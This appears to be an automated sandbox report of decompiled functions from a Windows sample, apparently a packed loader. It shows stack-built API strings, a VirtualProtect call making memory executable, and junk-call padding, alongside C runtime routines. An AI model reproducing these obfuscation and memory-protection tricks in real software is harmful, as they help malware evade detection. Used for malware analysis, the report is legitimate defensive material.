Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: f8e11907b28268d9c03a260760a71c241a3ef3e10c5a0f596d8fe18117109a85
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: D7510670D083C8DAEB11CBA8C849B9DBFB2AF11708F144058D5447F286C3FA5A58CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404E1C(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;

				 *0x443df8 = 0x56;
				 *0x443df9 = 0x69;
				 *0x443dfa = 0x72;
				 *0x443dff = 0x50;
				 *0x443e05 = 0x74;
				 *0x443e06 = 0;
				 *0x443dfb = 0x74;
				 *0x443dfc = 0x75;
				 *0x443dfd = 0x61;
				 *0x443dfe = 0x6c;
				 *0x443e00 = 0x72;
				 *0x443e01 = 0x6f;
				 *0x443e02 = 0x74;
				 *0x443e03 = 0x65;
				 *0x443e04 = 0x63;
				 *0x444e88 = GetProcAddress( *0x444e94, "msimg32.dll");
				_v8 = 0x20;
				_v8 = _v8 + 0x20;
				_t8 = VirtualProtect( *0x444e90,  *0x4450c4, _v8,  &_v12); // executed
				return _t8;
			}

0x00404e2c
0x00404e33
0x00404e3a
0x00404e41
0x00404e48
0x00404e4f
0x00404e56
0x00404e5d
0x00404e64
0x00404e6b
0x00404e72
0x00404e79
0x00404e80
0x00404e87
0x00404e8e
0x00404e9b
0x00404ea0
0x00404ea7
0x00404ebe
0x00404ec5

APIs

GetProcAddress.KERNEL32(msimg32.dll), ref: 00404E95
VirtualProtect.KERNELBASE(00000020,?), ref: 00404EBE

Strings

msimg32.dll, xrefs: 00404E21
, xrefs: 00404EA7

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: $msimg32.dll
API String ID: 3759838892-256693350
Opcode ID: f1e856b1094a08c08efaf0353dc2a999235139218ffdb59d9d57a86097bf36f0
Instruction ID: bd9d303411308f3e99d19587dc034badf0272bd5988586a4c7d9a8140ebc585f
Opcode Fuzzy Hash: f1e856b1094a08c08efaf0353dc2a999235139218ffdb59d9d57a86097bf36f0
Instruction Fuzzy Hash: E211006C8092C1DEE702CF54ED49B053FA66713B4AF1440B8E095066B2C3FB1718C77A

Uniqueness

Uniqueness Score: -1.00%

Function 008E05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 008E05EC

Strings

o, xrefs: 008E0600
apfHQ, xrefs: 008E05E2, 008E05E5

Memory Dump Source

Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_file.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 84d1dbe430b343727a2faacd9f0239ddc633d831711cd0f192cf6604117c6684
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 0F011E70C0428CEADB11DBD8C5183AEBFB5AF51309F148499C4096B252D7B69B98CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB55 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040CB55() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E0040D677(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E0040B100(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

0x0040cb58
0x0040cb5e
0x0040cb64
0x0040cb6d
0x00000000
0x0040cb6f
0x0040cb6f
0x0040cb6f
0x0040cb70
0x0040cb71
0x0040cb77
0x0040cb78
0x0040cb6f
0x0040cb82
0x0040cb86
0x0040cb8b
0x0040cb90
0x0040cba2
0x0040cba7
0x0040cb93
0x0040cb9e
0x0040cb66
0x0040cb69
0x0040cb69

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00406FD2), ref: 0040CB58
__malloc_crt.LIBCMT ref: 0040CB86
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040CB93

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
Instruction ID: e68d3ad6946e2ebdad21e99f61c40b24010c0b22ff8cb5065c2f402156d26964
Opcode Fuzzy Hash: 540efd0d5cb155af12a62a9ca8cb82a6a4a21e7cbbc29b15b2f14ee7371bbd70
Instruction Fuzzy Hash: CDF0E2369011209ACB2537757C898773238DA8A769312063BF492E3280E63C4C8282AC

Uniqueness

Uniqueness Score: -1.00%

Function 00404B4D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404B4D() {
				struct HINSTANCE__* _t1;

				 *0x443e01 = 0x6c;
				 *0x443dfb = 0x6d;
				 *0x443dfa = 0x69;
				 *0x443dfc = 0x67;
				 *0x443e00 = 0x64;
				 *0x443e03 = 0;
				 *0x443dfd = 0x33;
				 *0x443df9 = 0x73;
				 *0x443e02 = 0x6c;
				 *0x443dff = 0x2e;
				 *0x443dfe = 0x32;
				 *0x443df8 = 0x6d; // executed
				_t1 = LoadLibraryA("msimg32.dll"); // executed
				return _t1;
			}

0x00404b52
0x00404b59
0x00404b60
0x00404b67
0x00404b6e
0x00404b75
0x00404b7c
0x00404b83
0x00404b8a
0x00404b91
0x00404b98
0x00404b9f
0x00404ba6
0x00404bac

APIs

LoadLibraryA.KERNELBASE(msimg32.dll,00405896), ref: 00404BA6

Strings

msimg32.dll, xrefs: 00404B4D

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: msimg32.dll
API String ID: 1029625771-3287713914
Opcode ID: 014939b81b0a158b1e65ab06531bc0a62278e9ebab93e16f0f9ecd9b013db874
Instruction ID: a2a21168f7ea9ea285e5efab3a458b27fca38c762230874cdfde17eb733f7d86
Opcode Fuzzy Hash: 014939b81b0a158b1e65ab06531bc0a62278e9ebab93e16f0f9ecd9b013db874
Instruction Fuzzy Hash: EAF02458D4D2D1C9F7028B28A95AB002E970723F4AF1840A990E21A6A2C3FB0318C77E

Uniqueness

Uniqueness Score: -1.00%

Function 004074C4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004074C4(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4432c8 = _t6;
				if(_t6 != 0) {
					 *0x44625c = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x004074d9
0x004074df
0x004074e6
0x004074ed
0x004074f3
0x004074e9
0x004074e9
0x004074e9

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004074D9

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 78d3f72165d6dc13c1f83601e1bf38989b098d08fcd52eaab1c5740afed91f5d
Instruction ID: 7d513479de628913d9c70e9ff0461ea1defa92f758d6b876d3b6105dd0453cff
Opcode Fuzzy Hash: 78d3f72165d6dc13c1f83601e1bf38989b098d08fcd52eaab1c5740afed91f5d
Instruction Fuzzy Hash: 85D05E7AA54344ABEB105F716D08B663BDCA385795F108476F90DC61A0F5B4D6808A09

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB1B Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040BB1B() {
				void* _t1;

				_t1 = E0040BAA9(0); // executed
				return _t1;
			}

0x0040bb1d
0x0040bb23

APIs

__encode_pointer.LIBCMT ref: 0040BB1D

Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000000,?,0040BB22,00000000,0040DAE4,00443428,00000000,00000314,?,004084CB,00443428,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BABB
Part of subcall function 0040BAA9: TlsGetValue.KERNEL32(00000002,?,0040BB22,00000000,0040DAE4,00443428,00000000,00000314,?,004084CB,00443428,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BAD2
Part of subcall function 0040BAA9: RtlEncodePointer.NTDLL(00000000,?,0040BB22,00000000,0040DAE4,00443428,00000000,00000314,?,004084CB,00443428,Microsoft Visual C++ Runtime Library,00012010), ref: 0040BB10

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 7e4224bbe38dc51f274b3f09f605fa0bbf77e352b7c6d7f78f2a44217b079060
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040DAC5 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040DAC5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4185e8; // 0xfe2a5d19
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x443b08 = _t6;
				 *0x443b04 = _t22;
				 *0x443b00 = _t25;
				 *0x443afc = _t21;
				 *0x443af8 = _t27;
				 *0x443af4 = _t26;
				 *0x443b20 = ss;
				 *0x443b14 = cs;
				 *0x443af0 = ds;
				 *0x443aec = es;
				 *0x443ae8 = fs;
				 *0x443ae4 = gs;
				asm("pushfd");
				_pop( *0x443b18);
				 *0x443b0c =  *_t31;
				 *0x443b10 = _v0;
				 *0x443b1c =  &_a4;
				 *0x443a58 = 0x10001;
				_t11 =  *0x443b10; // 0x0
				 *0x443a0c = _t11;
				 *0x443a00 = 0xc0000409;
				 *0x443a04 = 1;
				_t12 =  *0x4185e8; // 0xfe2a5d19
				_v812 = _t12;
				_t13 =  *0x4185ec; // 0x1d5a2e6
				_v808 = _t13;
				 *0x443a50 = IsDebuggerPresent();
				_push(1);
				E0040FE79(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x403668);
				if( *0x443a50 == 0) {
					_push(1);
					E0040FE79(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040dac5
0x0040dac5
0x0040dac5
0x0040dac5
0x0040dac5
0x0040dac5
0x0040dac5
0x0040dacb
0x0040dacd
0x0040dacd
0x004116b8
0x004116bd
0x004116c3
0x004116c9
0x004116cf
0x004116d5
0x004116db
0x004116e2
0x004116e9
0x004116f0
0x004116f7
0x004116fe
0x00411705
0x00411706
0x0041170f
0x00411717
0x0041171f
0x0041172a
0x00411734
0x00411739
0x0041173e
0x00411748
0x00411752
0x00411757
0x0041175d
0x00411762
0x0041176e
0x00411773
0x00411775
0x0041177d
0x00411788
0x00411795
0x00411797
0x00411799
0x0041179e
0x004117b2

APIs

IsDebuggerPresent.KERNEL32 ref: 00411768
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041177D
UnhandledExceptionFilter.KERNEL32(00403668), ref: 00411788
GetCurrentProcess.KERNEL32(C0000409), ref: 004117A4
TerminateProcess.KERNEL32(00000000), ref: 004117AB

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 61c03205ef8c3e6e7e63563bb4364619f4ce14220ce7bd949dbf76a15cc36527
Instruction ID: 20be6c9399a4ce716897345fc28426f95aa05d4a3b3114d1affec13d3545586c
Opcode Fuzzy Hash: 61c03205ef8c3e6e7e63563bb4364619f4ce14220ce7bd949dbf76a15cc36527
Instruction Fuzzy Hash: AE21F5B89402409FD700DF25E945B447BB4FB0AB02F10803AE549A7A72E7B46A84CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C824 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C824() {

				SetUnhandledExceptionFilter(E0040C7E2);
				return 0;
			}

0x0040c829
0x0040c831

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C7E2), ref: 0040C829

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
Instruction ID: e2a8f789a288a585d98f9b92902466bf4f7c4288f4264d283a5847212c576c19
Opcode Fuzzy Hash: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
Instruction Fuzzy Hash: 5F900271291142C6C60417715E4A64665985A5C70276145796541E5CA5EB7450406919

Uniqueness

Uniqueness Score: -1.00%

Function 008E0042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: c21c9ab52cf2b744e11466062db4bfb90742f85da95ff8c3b1457c53a7e00997
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: DE117072340500AFD754DE66DCD1FA673EAFB89320B298555ED08CB312D6B5EC41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00404D37 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 76
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00404D37() {
				void* _v6;
				struct _COORD _v8;
				unsigned int _v12;
				long _v16;
				long _v20;
				int _v24;
				short _v2072;
				char _v4120;
				unsigned int _t15;
				void* _t16;
				intOrPtr _t32;
				intOrPtr _t34;

				E0040E260(0x1014);
				_t34 =  *0x444e90;
				_t15 =  *0x4450c4 >> 3;
				if(_t15 > 0) {
					_t32 = _t34;
					_v12 = _t15;
					do {
						if( *0x4450c4 == 0x959) {
							GetProcessWorkingSetSize(0, 0, 0);
							_v8 = 0;
							asm("stosw");
							FillConsoleOutputCharacterA(0, 0, 0, _v8,  &_v24);
							WriteConsoleW(0, 0, 0,  &_v16, 0);
							LCMapStringW(0, 0, 0, 0,  &_v2072, 0);
							LoadLibraryW(L"rijaxosetosezurinurikudeg");
							LoadLibraryA(0);
							WriteConsoleA(0, 0, 0,  &_v20, 0);
							__imp__GetConsoleAliasesW( &_v4120, 0, 0);
							GetFileInformationByHandle(0, 0);
						}
						_t16 = E00404BB7(0, _t32);
						_t32 = _t32 + 8;
						_t10 =  &_v12;
						 *_t10 = _v12 - 1;
					} while ( *_t10 != 0);
					return _t16;
				}
				return _t15;
			}

0x00404d3f
0x00404d49
0x00404d50
0x00404d57
0x00404d5f
0x00404d61
0x00404d64
0x00404d6e
0x00404d73
0x00404d7b
0x00404d82
0x00404d8e
0x00404d9c
0x00404dae
0x00404db9
0x00404dc0
0x00404dce
0x00404ddd
0x00404de5
0x00404de5
0x00404dec
0x00404df1
0x00404df4
0x00404df4
0x00404df4
0x00000000
0x00404dfe
0x00404e01

APIs

GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00404D73
FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00404D8E
WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D9C
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00404DAE
LoadLibraryW.KERNEL32(rijaxosetosezurinurikudeg), ref: 00404DB9
LoadLibraryA.KERNEL32(00000000), ref: 00404DC0
WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404DCE
GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00404DDD
GetFileInformationByHandle.KERNEL32(00000000,00000000), ref: 00404DE5

Strings

rijaxosetosezurinurikudeg, xrefs: 00404DB4

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Console$LibraryLoadWrite$AliasesCharacterFileFillHandleInformationOutputProcessSizeStringWorking
String ID: rijaxosetosezurinurikudeg
API String ID: 2068669440-2185336016
Opcode ID: 36c68f3142dffd2b610d81bd14dacbe93bdd748033fa54ede573d448f525ec73
Instruction ID: 1f82251b02b50db16ec5b467398f36478f02987073327340ac35c57c824ac964
Opcode Fuzzy Hash: 36c68f3142dffd2b610d81bd14dacbe93bdd748033fa54ede573d448f525ec73
Instruction Fuzzy Hash: FB11FC76802568BBD7219BA1EE48CEF7F7CFF8A351B000066F649E2160C6385641CBF9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5C9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 137
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0040B5C9(signed int __edx, char _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					if(_t100 != 0) {
						_t4 =  &_a4; // 0x405f77
						_t82 =  *_t4;
						__eflags = _t82;
						if(_t82 == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(_a12 > _t63 / _a8) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040B465(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E00408D86(_t100));
										_t74 = E00408CAA(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E00406324(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B100(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040747B();
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E00409867(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040b5c9
0x0040b5d9
0x0040b5ff
0x00000000
0x0040b5e0
0x0040b5e0
0x0040b5e5
0x0040b606
0x0040b606
0x0040b609
0x0040b60b
0x00000000
0x00000000
0x0040b60d
0x0040b612
0x0040b615
0x0040b618
0x00000000
0x00000000
0x0040b61d
0x0040b621
0x0040b628
0x0040b62b
0x0040b62e
0x0040b630
0x0040b63a
0x0040b632
0x0040b635
0x0040b635
0x0040b641
0x0040b643
0x0040b708
0x00000000
0x0040b649
0x0040b649
0x0040b64c
0x0040b64c
0x0040b652
0x0040b683
0x0040b683
0x0040b686
0x0040b6df
0x0040b6e6
0x0040b6e9
0x0040b714
0x0040b714
